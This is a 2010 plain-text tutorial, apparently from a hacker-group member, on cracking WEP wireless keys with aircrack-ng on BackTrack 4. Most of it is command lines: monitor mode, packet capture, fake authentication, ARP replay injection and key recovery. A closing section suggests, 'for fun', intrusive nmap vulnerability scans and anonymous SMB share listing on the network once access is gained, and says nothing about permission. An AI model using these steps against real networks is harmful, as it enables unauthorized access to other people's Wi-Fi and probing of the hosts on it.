__.....__                                    
           .-''         '.                                  
     .|   /     .-''"'-.  `.      .|                        
   .' |_ /     /________\   \   .' |_                       
 .'     ||                  | .'     |       _     _    _   
'--.  .-'\    .-------------''--.  .-'     .' |   | '  / |  
   |  |   \    '-.____...---.   |  |      .   | /.' | .' |  
   |  |    `.             .'    |  |    .'.'| |///  | /  |  
   |  '.'    `''-...... -'      |  '.'.'.'.-'  /|   `'.  |  
   |   /                        |   / .'   \_.' '   .'|  '/ 
   `'-'                         `'-'             `-'  `--'  


--== Simple WEP Cracking
--== by: Tetsu
--== date: 8/27/2010
--== tools: aircrack-ng 1.0 r1645, BackTrack4 r1


------------------- tl;dr --------------------
< boot BT4 >
killall wicd dhclient wpa_supplicant
rmmod ath9k				#or whatever your module is
modprobe ath9k 
airmon-ng start wlan0 			# => mon0
airodump-ng mon0
* airodump-ng mon0 -c 6 -w wait	
* aireplay-ng -1 5 -a 01:23:45:67:89 wlan0 
* aireplay-ng -3 -b 01:23:45:67:89 wlan0
* aircrack *.cap


------- alternatively, with attack5.sh --------

< boot BT4 >
killall wicd dhclient wpa_supplicant
rmmod ath9k				#or whatever your module is
modprobe ath9k 
airmon-ng start wlan0 			# => mon0
airodump-ng mon0
* airodump-ng mon0 -c 6 -w wait	
* bash attack5.sh 01:23:45:67:89 wlan0
* aircrack *.cap

* means in their own terminal
---------------------------------------------



I. Basic BT4 Usage:

  If you already know how to use BackTrack and Linux, you can skip this.


1. Boot the BackTrack4 (bt4) live-cd

  ISO images are located at http://www.backtrack-linux.org/downloads/,
otherwise members of either FAMiLab or DC407 will be more than willing 
to provide you with a free disk. 
  Put the disk in your cd/dvd drive, reboot, and hit some F# keys. F12 
usually pulls you a boot-options menu. On Macbook's if you hold Option, 
it will show you a graphical boot menu -- wait for the disk drive to 
show up. For PCs, you may need to navigate the BIOS to change the Boot 
Order.


2. Start an X-Windows Session

  At the prompt that says something like "root@bt# " type 'startx' 
(without quotes) and enter. This will start the desktop environment.
BT4 uses KDE, but the DE changes with each version, and is entirely 
up to you which one you'd like to use. I suggest trying them all. 
WindowMaker was always my favorite.

  Find the Konsole, or some Terminal Emulator application (like xterm),
and launch 4 of them.



II. Crackin' The WEPs


1. Reset Your Hardware

  The quickest way to make sure your wireless interfaces are in the 
right state is to reset your hardware. My wireless card's kernel 
module (like a driver in windows) is 'ath9k', so I do:

     killall wicd dhclient wpa_supplicant
     rmmod ath9k
     modprobe ath9k
     ifconfig wlan0 down
     airmon-ng start wlan0

which kills processes that might bring the interface back up, 
reinserts it into the kernel, ensures that it's down, and starts 
a new monitoring interface off wlan0 called mon0. Keep in mind
that your wifi interface may be eth1, eth0, or ath0. Use 
`iwconfig` to see a list of interfaces and their wireless 
extensions. 


2. Lay of the Land

  Run airodump-ng once for a short while to see what networks are 
available:

    airodump-ng mon0

then hit ctrl-c and choose a channel number to monitor on. 


3. Select a Channel and Record

  Say we find an AP we want to crack called 'Crack Me', and it's 
on channel 6. We do this to record traffic from that AP, and hold 
the wireless card's radio on channel 6:

    airodump-ng -c 6 -w CrackMe mon0


4. Fake-Authentication

  It is not necessary, but you will always want to use fake 
authentication. It tells you when your attack is succeeding, when 
you're in range, and if you can actually inject. It is very useful, 
and ensures that you are capable of communicating with the AP. So,
in it's own terminal, run:

    aireplay-ng -1 5 -a <BSSID> wlan0


5. ARP Replay

  You will now wait for arp packets to come across the network. 
Once some useable arp packets do come through, aireplay-ng will 
start replaying them back to the router so that it can receive a 
new re-encrypted version of the same information which statistically 
reveals enough about the content of the message to find the WEP
key and passphrase:

    aireplay-ng -3 -b <BSSID> -r CrackMe-01.cap wlan0

The -r CrackMe-01.cap is a way of telling aireplay-ng to load data 
from CrackMe-01.cap (the file airodump-ng is writing to) before 
listening on wlan0. You may have captured 11 or 50 ARP packets 
before running this command, and it's just a waste of time not to 
use that data.


6. Aircrack-ng - The Endgame

  Once you've reached about 20,000 data packets, you should be able 
to determine the AP's WEP key. 10,000 is sometimes enough. I've 
succeeded with as little as 4,000 before with very simple keys. 

    aircrack-ng *.cap -e "Crack Me"


III. What Now?

  BackTrack 4 comes with a bunch of neat utilities you can use after 
you have gained access to a network. If you are doing simple wifi 
pentesting, tell your client that their WEP router is compromisable.

  For fun, though, try these: 

    lanmap -i wlan0 2>/dev/null >/dev/null & gqview &
    nmap --script=smb-check-vulns 192.168.1.*
    nmap -sV --script='(default or discovery) and intrusive' \
	-O 192.168.1.* -oG 192.168.1.gnmap
    nmap -p80 192.168.1.* -PN -oG http_servers.gnmap && \
	grep open http_servers.gnmap | cut -d \  -f 2 | \
	while read i; do firefox "$i"; done
    grep 139/open 192.168.1.gnmap | cut -d \  -f 2 | \
        while read i; do smbclient -N -L $i; done